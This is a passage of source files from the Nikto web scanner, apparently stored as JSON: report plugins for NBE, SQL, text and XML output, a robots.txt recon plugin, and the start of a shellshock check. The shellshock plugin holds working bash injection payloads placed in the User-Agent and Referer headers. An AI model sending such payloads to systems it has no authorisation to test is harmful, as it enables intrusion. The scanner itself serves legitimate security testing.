    "content": "#VERSION,2.02\n###############################################################################\n#  Copyright (C) 2010 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Nessus NBE Reporting\n###############################################################################\nsub nikto_report_nbe_init {\n    my $id = { name          => \"report_nbe\",\n               full_name     => \"NBE reports\",\n               author        => \"Seccubus\",\n               description   => \"Produces a NBE report.\",\n               report_head   => \\&nbe_open,\n               report_item   => \\&nbe_item,\n               report_format => 'nbe',\n               copyright     => \"2010 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub nbe_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file and produce header\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Write header\n    print OUT\n      \"timestamps|network|host|port|nikto_id|prio|$VARIABLES{'name'} v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\n\";\n    return OUT;\n}\n\nsub nbe_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my ($line, $network);\n        if ($item->{'mark'}->{'hostname'} && $item->{'mark'}->{'port'} && $item->{'nikto_id'}) {\n            if ($item->{'mark'}->{'hostname'} =~ /^(\\d+\\.\\d+\\.\\d+)\\.\\d+$/) {\n                $network = $1;\n            }\n            my $hostname = $item->{'mark'}->{'vhost'} ? $item->{'mark'}->{'vhost'} : $item->{'mark'}->{'hostname'};\n\n            $line .= \"results|\";\n            $line .= \"$network|\";\n            $line .= \"$hostname|\";\n            $line .= \"$item->{'mark'}->{'port'}|\";\n            $line .= \"$item->{'nikto_id'}|\";\n            $line .= \"Security Warning|\";\n            if ($item->{'osvdb'})  { $line .= OSVDB-$item->{'osvdb'} . \": \" }\n            if ($item->{'method'}) { $line .= $item->{'method'} . \" \" }\n            if (($uri ne '') && ($uri !~ /^$mark->{'root'}/))\n            \t{ $line .= $mark->{'root'} . ${'uri'} . \": \" }\n            $line .= $item->{'message'};\n            print $handle \"$line\\n\";\n        }\n        else {\n            my $debug = \"Data provided:\\n$handle, $mark, $item\";\n            $debug .= \"\\nContents of \\$mark:\";\n            foreach my $key (sort keys %$mark) {\n                $debug .= \"\\n$key - $mark->{$key}\";\n            }\n            $debug .= \"\\nContents of \\$item:\";\n            foreach my $key (sort keys %$item) {\n                $debug .= \"\\n$key - $item->{$key}\";\n            }\n            $debug .= \"\\nContents of \\$item->{mark}:\";\n            foreach my $key (sort keys %{ $item->{mark} }) {\n                $debug .= \"\\n$key - $item->{mark}->{$key}\";\n            }\n\n            #die $debug;\n            nprint(\"+ Invalid reporting line: $debug\");\n        }\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_sqlg.plugin",
    "content": "#VERSION,2.00\n###############################################################################\n#  Copyright (C) 2013 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# SQL Reporting\n# Sample table create (mysql):\n#\tcreate table nikto_table (testid varchar(6) not null, ip varchar(15),\n#\thostname text, port int(5), usessl tinyint(1), osvdb int, httpmethod text,\n#\turi text, message text, request blob, response blob);\n###############################################################################\nsub nikto_report_sqlg_init {\n    my $id = { name              => \"report_sqlg\",\n               full_name         => \"Generic SQL reports\",\n               author            => \"Sullo\",\n               description       => \"Produces SQL inserts into a generic database.\",\n               report_head       => \\&sqlg_open,\n               report_host_start => \\&sqlg_host_start,\n               report_item       => \\&sqlg_item,\n               report_format     => 'sql',\n               copyright         => \"2013 Chris Sullo\"\n               };\n    return $id;\n}\n\n###############################################################################\n# open output file\nsub sqlg_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file and produce header\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Write header\n    my $opt = $CLI{'all_options'};\n    $opt =~ s/'/\\\\'/g;\n    print OUT \"# $VARIABLES{'name'} - v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\n\";\n    print OUT \"# Options:       $opt\\n\";\n\tprint OUT \"# Start Time:    \" . localtime($COUNTERS{'scan_start'}) . \"\\n\";\n\tprint OUT \"# End Time:      \" . localtime($COUNTERS{'scan_end'}) . \"\\n\";\n\tprint OUT \"\\n\";\n\n    return OUT;\n}\n\n###############################################################################\n# start output\nsub sqlg_host_start {\n    my ($handle, $mark) = @_;\n    my $banner = $mark->{'banner'};\n    $banner =~ s/\"/\\\\'/g;\n    my $ssl=0;\n    if (defined $mark->{'ssl_cipher'}) { $ssl=1; }\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    my $sql=\"insert into nikto_table (testid, ip, hostname, port, usessl, osvdb, httpmethod, uri, message) values(\";\n    $sql .= \"'999958','$mark->{'ip'}','$hostname','$mark->{'port'}','$ssl','0','GET','/','$banner');\\n\";\n\tprint $handle $sql;\n\n    if (defined $mark->{'ssl_cipher'}) {\n    \tmy $ciphers = $mark->{'ssl_cipher'};\n    \tmy $issuer = $mark->{'ssl_cert_issuer'};\n    \tmy $subj = $mark->{'ssl_cert_subject'};\n    \tmy $alt = $mark->{'ssl_cert_altnames'};\n    \t$ciphers =~ s/'/\\\\'/g;\n    \t$issuer =~ s/'/\\\\'/g;\n    \t$subj =~ s/'/\\\\'/g;\n    \t$alt =~ s/'/\\\\'/g;\n\tprint OUT \"# SSL Ciphers: $ciphers\\n\";\n\tprint OUT \"# SSL Altnames: $alt\\n\";\n\tprint OUT \"# SSL Issuer:  $issuer\\n\";\n\tprint OUT \"# SSL Info:    $subj\\n\";\n    }\n\n    return;\n}\n\n###############################################################################\n# print an item\nsub sqlg_item {\n    my ($handle, $mark, $item) = @_;\n    foreach my $uri (split(' ', $item->{'uri'})) {\n        my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n \t$hostname = quotemeta($hostname);\n    \tmy $httpmethod = quotemeta($item->{'method'});\n\tmy $msg = quotemeta($item->{'message'});\n        my $root = quotemeta($mark->{'root'});\n\tmy $rootq = quotemeta($mark->{'root'});  # temporary, just for regex\n        $uri = quotemeta($uri);\n        my $ssl = $mark->{'ssl_cipher'} ? 1 : 0;\n\n    \tmy $sql=\"insert into nikto_table (testid, ip, hostname, port, usessl, osvdb, httpmethod, uri, message, request, response) values(\";\n\t\t$sql .= \"'$item->{'nikto_id'}','$item->{'mark'}->{'ip'}','$hostname','$item->{'mark'}->{'port'}','$ssl',\";\n\t\t$sql .= \"'$item->{'osvdb'}','$httpmethod',\";\n\n        if (($uri ne '') && ($root ne '') && ($uri !~ /^$rootq/)) {\n\t\t$sql .= \"'\" . $root . $uri . \"',\"; }\n\telse {\n\t\t$sql .= \"'$uri',\";\n\t\t}\n\n\t$msg =~ s/^$uri:\\s//;\n\t$msg =~ s/^$rootq$uri:\\s//;\n        $sql .= \"'$msg',\";\n\n        # Rebuild the request from the hash -- no need to escape as it's base64 encoded\n        my $req = $$item{'request'};\n    \tif ($req->{'whisker'}{'method'} eq '') {\n\t\t$sql .= \"'',\";\n\t\t}\n    \telse {\n    \t\tmy $rstring = $req->{'whisker'}{'method'} . \" \"\n      \t\t\t. $req->{'whisker'}{'uri'} . \" \"\n      \t\t\t. $req->{'whisker'}{'protocol'} . \"/\"\n\t\t\t\t. $req->{'whisker'}{'version'} . \"\\n\";\n\n    \t\tforeach my $header (keys %{$req}) {\n        \t\tnext if $header eq 'whisker';\n        \t\t$rstring .= $header . \": \" . $req->{$header} . \"\\n\";\n    \t\t\t}\n        \t$sql .= \"'\" . LW2::encode_base64($rstring,'') . \"',\";\n\t\t\t}\n\n\t# response content\n        my $response = $$item{'response'};\n\t$rstring='';\n    \tif ($response->{'whisker'}{'protocol'} ne '') {\n    \t\t$rstring = $response->{'whisker'}{'protocol'} . \"/\"\n      \t\t. $response->{'whisker'}{'version'} . \" \"\n      \t\t. $response->{'whisker'}{'code'} . \" \"\n      \t\t. $response->{'whisker'}{'message'} . \"\\n\";\n    \t\tforeach my $header (@{ $response->{'whisker'}{'header_order'} }) {\n        \t\t$rstring .= $header . \": \" . $response->{$header} . \"\\n\";\n    \t\t\t}\n    \t\t$rstring .= \"\\n\" . $response->{'whisker'}{'data'} . \"\\n\";\n    \t\t}\n\n        $sql .= \"'\" . LW2::encode_base64($rstring,'') . \"');\";\n        print $handle \"$sql\\n\";\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_text.plugin",
    "content": "#VERSION,2.05\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Text Reporting\n###############################################################################\nsub nikto_report_text_init {\n    my $id = { name              => \"report_text\",\n               full_name         => \"Text reports\",\n               author            => \"Tautology\",\n               description       => \"Produces a text report.\",\n               report_head       => \\&text_open,\n               report_host_start => \\&text_host,\n               report_item       => \\&text_item,\n               report_format     => 'txt',\n               copyright         => \"2008 Chris Sullo\"\n               };\n    return $id;\n}\n\nsub text_open {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # Open file and produce header\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # Write header\n    print OUT \"- $VARIABLES{'name'} v$VARIABLES{'version'}/$VARIABLES{'core_version'}\\n\";\n\n    return OUT;\n}\n\nsub text_host {\n    my ($handle, $mark) = @_;\n    my ($curr_host, $curr_port);\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n    print $handle \"+ Target Host: $hostname\\n\";\n    print $handle \"+ Target Port: $mark->{port}\\n\";\n}\n\nsub text_item {\n    my ($handle, $mark, $item) = @_;\n\n    foreach my $uri (split(' ', $item->{uri})) {\n        my $line = \"+ \";\n        if ($item->{osvdb})  { $line .= \"OSVDB-\" . $item->{osvdb} . \": \" }\n        if ($item->{method}) { $line .= $item->{method} . \" \" }\n        if (($uri ne '') && ($uri !~ /^$mark->{'root'}/))\n        \t{ $line .= $mark->{'root'} . ${'uri'} . \": \" }\n        $line .= $item->{message};\n        print $handle \"$line\\n\";\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_report_xml.plugin",
    "content": "#VERSION,2.06\n###############################################################################\n#  Copyright (C) 2007 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# XML Reporting\n###############################################################################\nsub nikto_report_xml_init {\n    my $id = { name              => \"report_xml\",\n               full_name         => \"Report as XML\",\n               author            => \"Sullo/Jabra\",\n               description       => \"Produces an XML report.\",\n               report_head       => \\&xml_head,\n               report_host_start => \\&xml_host_start,\n               report_host_end   => \\&xml_host_end,\n               report_item       => \\&xml_item,\n               report_summary    => \\&xml_summary,\n               report_close      => \\&xml_close,\n               report_format     => 'xml',\n               copyright         => \"2008 Chris Sullo\"\n               };\n\n    # load up the templates now\n    xml_open_templates();\n    return $id;\n}\n\nsub xml_head {\n    my ($file) = @_;\n    print STDERR \"+ ERROR: Output file not specified.\\n\" if $file eq '';\n\n    # check for xml headers\n    $header_present = 0;\n\n    if (-e $file) {\n        open(IN, \"<$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for read: $@\\n\";\n        my $linectr = 0;\n        while (<IN>) {\n            $linectr++;\n            if ($_ =~ /DOCTYPE niktoscan/) { $header_present = 1; last; }\n            if ($linectr > 10) { last; }\n        }\n        close(IN);\n    }\n\n    open(OUT, \">$file\") || die print STDERR \"+ ERROR: Unable to open '$file' for write: $@\\n\";\n\n    # If file doesn't contain a header, write it\n    if (!$header_present) {\n        my $xml = xml_change_vars($TEMPLATES{xml_start});\n        $xml =~ s/\\#NIKTODTD#/$CONFIGFILE{NIKTODTD}/;\n        print OUT \"$xml\";\n    }\n\n    # Return file handle\n    return OUT;\n}\n###############################################################################\nsub xml_summary {\n    my ($handle, $mark) = @_;\n    my $xml = xml_change_vars($TEMPLATES{'xml_summary'}, $mark);\n    print $handle \"$xml\\n\";\n\n    return;\n}\n###############################################################################\nsub xml_close {\n    my ($handle, $mark) = @_;\n    my $xml = xml_change_vars($TEMPLATES{xml_close}, $mark);\n    print $handle $xml;\n\n    close($handle);\n    return;\n}\n###############################################################################\nsub xml_host_start {\n    my ($handle, $mark) = @_;\n    my $xml = xml_change_vars($TEMPLATES{xml_host_head}, $mark);\n    print $handle \"$xml\\n\";\n\n    return;\n}\n###############################################################################\nsub xml_host_end {\n    my ($handle, $mark) = @_;\n    my $xml = xml_change_vars($TEMPLATES{xml_end}, $mark);\n    print $handle \"$xml\\n\";\n\n    return;\n}\n###############################################################################\nsub xml_item {\n    my ($handle, $mark, $item) = @_;\n    my $xml = xml_change_vars($TEMPLATES{xml_host_item}, $mark, $item);\n    print $handle \"$xml\\n\";\n\n    return;\n}\n###############################################################################\nsub xml_open_templates {\n    foreach my $t (dirlist($CONFIGFILE{TEMPLATEDIR}, \"xml.*\")) {\n        open(T, \"<$CONFIGFILE{TEMPLATEDIR}/$t\");\n        my @TEMPLATE = <T>;\n        close(T);\n        my $T = join(\"\", @TEMPLATE);\n        $t =~ s/\\..*$//;\n        $TEMPLATES{$t} = $T;\n    }\n\n    return;\n}\n###############################################################################\nsub xml_change_vars {\n    my ($template, $mark, $item) = @_;\n    my %variables;\n    my $protocol = \"http\";\n    if ($mark->{ssl}) { $protocol .= \"s\"; }\n    my $hostname = $mark->{'vhost'} ? $mark->{'vhost'} : $mark->{'hostname'};\n\n    $variables{\"#TEMPL_HCTR#\"}        = $VARIABLES{'TEMPL_HCTR'};\n    $variables{\"#TEMPL_END#\"}         = date_disp($mark->{'end_time'});\n    $variables{\"#TEMPL_HOSTNAME#\"}    = hex_enc($hostname);\n    $variables{\"#TEMPL_HOST_HEADER#\"} = hex_enc($hostname);\n    if (defined $mark->{vhost}) {\n        $variables{\"#TEMPL_HOST_HEADER#\"} = hex_enc($mark->{'vhost'});\n    }\n\n    $variables{\"#TEMPL_SSL_INFO#\"} = \"\";\n    if (defined $mark->{'ssl_cipher'}) {\n        $variables{\"#TEMPL_SSL_INFO#\"} =\n          \"<ssl ciphers=\\\"\" . hex_enc($mark->{ssl_cipher}) . \"\\\" issuers=\\\"\" .\n\t\t  hex_enc($mark->{ssl_cert_issuer}) . \"\\\" info=\\\"\" .\n\t\t  hex_enc($mark->{ssl_cert_subject}) . \"\\\" altnames=\\\"\" .\n                  hex_enc($mark->{ssl_cert_altnames}) . \"\\\" />\";\n    }\n\n    $variables{\"#TEMPL_IP#\"}                 = simple_enc($mark->{'ip'});\n    $variables{\"#TEMPL_ITEMS_TESTED#\"}       = $COUNTERS{total_checks};\n    $variables{\"#TEMPL_PORT#\"}               = $mark->{'port'};\n    $variables{\"#TEMPL_START#\"}              = date_disp($mark->{'start_time'});\n    $variables{\"#TEMPL_END#\"}                = date_disp($mark->{'end_time'});\n    $variables{\"#TEMPL_NIKTO_VER#\"}          = $VARIABLES{'version'};\n    $variables{\"#TEMPL_BANNER#\"}             = hex_enc($mark->{'banner'});\n    $variables{\"#TEMPL_NIKTO_CLI#\"}          = hex_enc($CLI{'all_options'});\n    $variables{\"#TEMPL_CTR#\"}                = $COUNTERS{'total_checks'};\n    $variables{\"#TEMPL_NIKTO_HOSTS_TESTED#\"} = $COUNTERS{'hosts_completed'};\n    $variables{\"#TEMPL_ELAPSED#\"}            = $mark->{'end_time'} - $mark->{'start_time'};\n    $variables{\"#TEMPL_LINK_IP#\"} =\n      $protocol . \"://\" . $mark->{'ip'} . \":\" . $mark->{'port'} . $mark->{'root'};\n    if ($variables{\"#TEMPL_LINK_IP#\"} !~ /\\/$/) { $variables{\"#TEMPL_LINK_IP#\"} .= '/'; }\n    $variables{\"#TEMPL_ITEMS_FOUND#\"}  = $mark->{'total_vulns'};\n    $variables{\"#TEMPL_SCAN_START#\"}   = localtime($COUNTERS{'scan_start'});\n    $variables{\"#TEMPL_SCAN_END#\"}     = localtime($COUNTERS{'scan_end'});\n    $variables{\"#TEMPL_SCAN_ELAPSED#\"} = $COUNTERS{'scan_elapsed'} . \" seconds\";\n    $variables{\"#TEMPL_ERRORS#\"}       = $mark->{'total_errors'};\n\n    $variables{\"#TEMPL_LINK_NAME#\"} = \"N/A\";\n    if ($hostname ne \"\") {\n        $variables{\"#TEMPL_LINK_NAME#\"} =\n          $protocol . \"://\" . $hostname . \":\" . $mark->{'port'} . $mark->{'root'};\n    }\n    if ($variables{\"#TEMPL_LINK_NAME#\"} !~ /\\/$/) { $variables{\"#TEMPL_LINK_NAME#\"} .= '/'; }\n    $variables{\"#ID#\"} = $item->{'nikto_id'};\n\n    # OSVDB info\n    my $refs = \"\";\n    my $OSVDB = $item->{'osvdb'};\n    if ($OSVDB !~ /\\d+/) { $OSVDB = 0; }\n    if ($OSVDB != 0) {\n        $refs = \"https://vulners.com/osvdb/OSVDB:\" . $OSVDB;\n        }\n\n    $variables{\"#TEMPL_OSVDB#\"} = $OSVDB;\n    $variables{\"#TEMPL_OSVDB_LINK#\"} = $refs;\n\n    # For future XML modification\n    #<references><![CDATA[#TEMPL_REFERENCES#]]></references>\n    #$variables{\"#TEMPL_REFERENCES#\"} = $refs;\n\n\n    # Scanner Messages Handling\n    $variables{\"#TEMPL_SMMSG#\"} = $item->{'message'};\n\n    # Positives Handling\n    if ($template =~ /\\#TEMPL_MSG#/) {\n\tmy $uri = $item->{'uri'};\n        if (($uri ne '') && ($uri !~ /^$mark->{'root'}/))\n\t\t{ $uri = $mark->{'root'} . $uri . \": \" }\n        $variables{\"#TEMPL_URI#\"}         = simple_enc($uri);\n        $variables{\"#TEMPL_MSG#\"}         = $item->{'message'};\n        $variables{\"#TEMPL_HTTP_METHOD#\"} = $item->{'method'};\n\n        $variables{\"#TEMPL_ITEM_IP_LINK#\"} =\n          \"$protocol://$variables{\\\"#TEMPL_IP#\\\"}:$mark->{port}$variables{\\\"#TEMPL_URI#\\\"}\";\n        $variables{\"#TEMPL_ITEM_NAME_LINK#\"} = \"\";\n        if ($hostname ne \"\") {\n            $variables{\"#TEMPL_ITEM_NAME_LINK#\"} = \"$protocol://$hostname:$mark->{'port'}$variables{\\\"#TEMPL_URI#\\\"}\";\n        }\n    }\n\n    foreach my $var (keys %variables) { $template =~ s/$var/$variables{$var}/g; }\n\n    return $template;\n}\n###############################################################################\nsub hex_enc {\n    my $invar = $_[0] || return;\n    my $outvar;\n    foreach my $c (split(//, $invar)) {\n        my $n = ord($c);\n        if (($n > 127) || ($n < 32) || ($n == 38) || ($n == 60) || ($n == 62) | ($n == 34)) {\n            $outvar .= sprintf '%#x', $n;\n        }\n        else { $outvar .= $c; }\n    }\n    return $outvar;\n}\n###############################################################################\nsub simple_enc {\n    my $var = $_[0] || return;\n    $var =~ s/</&lt;/g;\n    $var =~ s/>/&gt;/g;\n    $var =~ s/\"/&quot;/g;\n    return $var;\n}\n\nsub nikto_reports { }    # so core doesn't freak\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_robots.plugin",
    "content": "#VERSION,2.06\n###############################################################################\n#  Copyright (C) 2004 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to \n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check out the robots.txt file\n###############################################################################\nsub nikto_robots_init {\n    my $id = {\n        name      => \"robots\",\n        full_name => \"Robots\",\n        author    => \"Sullo\",\n        description =>\n          \"Checks whether there's anything within the robots.txt file and analyses it for other paths to pass to other scripts.\",\n        hooks => { recon => { method => \\&nikto_robots,\n                              weight => 49,\n                              },\n                     },\n        copyright => \"2008 Chris Sullo\",\n\t\toptions     => {\n\t\t\t\t\t nocheck => \"Flag to disable checking entries in robots file.\",\n\t\t\t\t\t }\n        };\n    return $id;\n}\n\nsub nikto_robots {\n    my ($mark, $parameters) = @_;\n    return if $mark->{'terminate'};\n    my ($code, $content, $errors, $request, $response) = nfetch($mark, \"/robots.txt\", \"GET\", \"\", \"\", \"\", \"robots\");\n    my $onlyroot=1;\n\n    if (($code eq 200) || ($code eq $FoF{'okay'}{'response'})) {\n        if (is_404(\"robots.txt\", $content, $code, $response->{'location'})) { return; }\n\n        my ($DIRS, $RFILES) = \"\";\n        my $DISCTR = 0;\n        my @DOC = split(/\\n/, $content);\n        my $tocheck;\n        foreach my $line (@DOC) {\n            $line =~ s/(?:^\\s+|\\s+$)//g;\n            $line = quotemeta($line);\n            if ($line =~ /allow/i) {\n                chomp($line);\n\t\t\t\t# Report if Allow\n\t\t\t\tif ($line =~ /^allow/i) { $onlyroot = 0; }\n                $line =~ s/\\#.*$//;\n                $line =~ s/\\s+/ /g;\n                $line =~ s/\\t/ /g;\n                $line =~ s/(?:dis)?allow(?:\\\\:)?(?:\\\\\\s+)?//i;\n                $line =~ s/\\/+/\\//g;\n\t\t$line =~ s/\\\\//g;\n\n                if ($line eq \"\") { next; }\n\n                # try to figure out file vs dir... just guess...\n                if (($line !~ /\\./) && ($line !~ /\\/$/)) { $line .= \"/\"; }\n\n                $line = LW2::uri_normalize($line);\n\n                # figure out dirs/files...\n                my $realdir  = validate_and_fix_regex(LW2::uri_get_dir($line));\n                my $realfile = validate_and_fix_regex($line);\n                $realfile =~ s/^$realdir//;\n\n                nprint(\"- robots.txt entry dir:$realdir -- file:$realfile\", \"d\");\n                if (($realdir  ne \"\") && ($realdir  ne \"/\")) { $DIRS{$realdir}++; }\n                if (($realfile ne \"\") && ($realfile ne \"/\")) { $RFILES{$realfile}++; }\n                $DISCTR++;\n\n\t\t\t\tif (($realdir  ne \"\") && ($realdir  ne \"/\")) { $onlyroot = 0; }\n\t\t\t\tif (($realdir  ne \"\") && ($realdir  ne \"/\")) { $onlyroot = 0;}\n\t\t\t\tnext if (($realdir eq \"/\" && $realfile eq \"\") ||\n\t\t\t\t         ($realfile eq \"/\" && $realdir eq \"\"));\n                $tocheck{$line}=1;\n            }    # end if $line =~ allow\n        }    # end foreach my $line (@DOC)\n\n        # Check for allowed paths\n        foreach my $line (keys %tocheck) {\n            print(\"line: $line\\n\");\n        \tif (!defined($parameters->{'nocheck'})) {\n\t\t\t\tmy ($res, $content, $error, $request, $response) = nfetch($mark, $line, \"GET\", \"\", \"\", \"Robots: Check for URI\");\n\t\t\t\tif (!is_404($line, $content, $res, $response->{'location'}) && ($res ne \"403\")) {\n\t\t\t\t\tadd_vulnerability($mark, \"Entry '$line' in robots.txt returned a non-forbidden or redirect HTTP code ($res)\", 999997, 0, \"GET\", \"/$line\", $request, $response);\n\t\t\t\t}\n\t\t\t}\n        }\n\n        # add them  to mutate dir/file\n        foreach my $dir (sort keys %DIRS) {\n\t    my $raw  = $dir;\n            $raw =~ s/\\\\//g;\n\t    $dir = validate_and_fix_regex($dir);\n\n            # Add to variables\n            if ($dir =~ /cgi/i && $VARIABLES{\"\\@CGIDIRS\"} !~ /$dir/) {\n                $VARIABLES{\"\\@CGIDIRS\"} .= \" $raw\";\n            }\n            if ($dir =~ /forum/i && $VARIABLES{\"\\@NUKE\"} !~ /$dir/) {\n                $VARIABLES{\"\\@NUKE\"} .= \" $raw\";\n            }\n            if ($dir =~ /pass/i && $VARIABLES{\"\\@PASSWORDDIRS\"} !~ /$dir/) {\n                $VARIABLES{\"\\@PASSWORDDIRS\"} .= \" $raw\";\n            }\n            if ($dir =~ /nuke/i && $VARIABLES{\"\\@NUKE\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@NUKE\"} .= \" $raw\";\n            }\n        \tif ($dir =~ /admin/i && $VARIABLES{\"\\@ADMIN\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@ADMIN\"} .= \" $raw\";\n            }\n            if ($dir =~ /phpmy/i && $VARIABLES{\"\\@PHPMYADMIN\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@PHPMYADMIN\"} .= \" $raw\";\n            }\n            if ($dir =~ /fck/i && $VARIABLES{\"\\@FCKEDITOR\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@FCKEDITOR\"} .= \" $raw\";\n            }\n            if ($dir =~ /crystal/i && $VARIABLES{\"\\@CRYSTALREPORTS\"} !~ /$dir/i) {\n                $VARIABLES{\"\\@CRYSTALREPORTS\"} .= \" $raw\";\n            }\n        }\n\n        foreach my $file (sort keys %RFILES) {\n            my $raw = $file;\n            $raw =~ s/\\\\//g;\n\t    $file = validate_and_fix_regex($file);\n\n            # Add to variables\n            if ($file =~ /pass/i && $VARIABLES{\"\\@PASSWORDFILES\"} !~ /$file/i) {\n                $VARIABLES{\"\\@PASSWORDFILES\"} .= \" $raw\";\n            }\n        }\n\n        my $msg;\n        if ($DISCTR eq 1) { $msg = \"contains $DISCTR entry which should be manually viewed.\"; }\n        elsif ($DISCTR > 1) { $msg = \"contains $DISCTR entries which should be manually viewed.\"; }\n        else { $msg = \"retrieved but it does not contain any 'disallow' entries (which is odd).\"; }\n\n\t\tif ($onlyroot eq 0) {\n\t\t\tadd_vulnerability($mark, \"\\\"robots.txt\\\" $msg\", 999996, 0, \"GET\", \"/robots.txt\", $request, $response);\n\t\t}\n    }\n}\n\n1;\n"
  },
  {
    "path": "nikto/program/plugins/nikto_shellshock.plugin",
    "content": "#VERSION,2.01\n###############################################################################\n#  Copyright (C) 2014 Chris Sullo\n#\n#  This program is free software; you can redistribute it and/or\n#  modify it under the terms of the GNU General Public License\n#  as published by the Free Software Foundation; version 2\n#  of the License only.\n#\n#  This program is distributed in the hope that it will be useful,\n#  but WITHOUT ANY WARRANTY; without even the implied warranty of\n#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#  GNU General Public License for more details.\n#\n#  You should have received a copy of the GNU General Public License\n#  along with this program; if not, write to\n#  Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n###############################################################################\n# PURPOSE:\n# Check for the bash 'shellshock' vulnerability\n###############################################################################\nsub nikto_shellshock_init {\n    my $id = { name        => \"shellshock\",\n               full_name   => \"shellshock\",\n               author      => \"sullo\",\n               description => \"Look for the bash 'shellshock' vulnerability.\",\n               hooks       => { scan => { method => \\&nikto_shellshock, weight => 20 }, },\n               copyright   => \"2014 Chris Sullo\",\n               options => { uri => \"uri to assess\", },\n               };\n\n    return $id;\n}\n\nsub nikto_shellshock {\n    my ($mark, $parameters) = @_;\n    my ($found, @names,);\n\n\n    # This would be better coming from live scan results and not db_variables\n    my @files = split(/ /, $VARIABLES{\"\\@SHELLSHOCK\"});\n\n    push(@files, \"\");\n    my %headers;\n    $headers{'User-Agent'} = '() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;';\n    $headers{'Referer'} = '() { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }';\n    my @dirs = split(/ /, $VARIABLES{'@CGIDIRS'});\n    push(@dirs, \"/\");\n\n    #check for FP... error in page\n    my $checkcontent=1;\n    my ($res, $content, $error, $request, $response) = nfetch($mark, \"/\", \"GET\", \"\", \\%headers, \"\", \"shellshock\");\n    if ($content =~ /93e4r0-CVE/) {\n\t$checkcontent=0;\n\tnprint(\"Content seems to contain error headers, ignoring content match in shellshock plugin\",\"v\");\n\t}\n\n    if (defined $parameters->{'uri'}) {\n\n        # request by hostname\n        my ($res, $content, $error, $request, $response) = nfetch($mark, 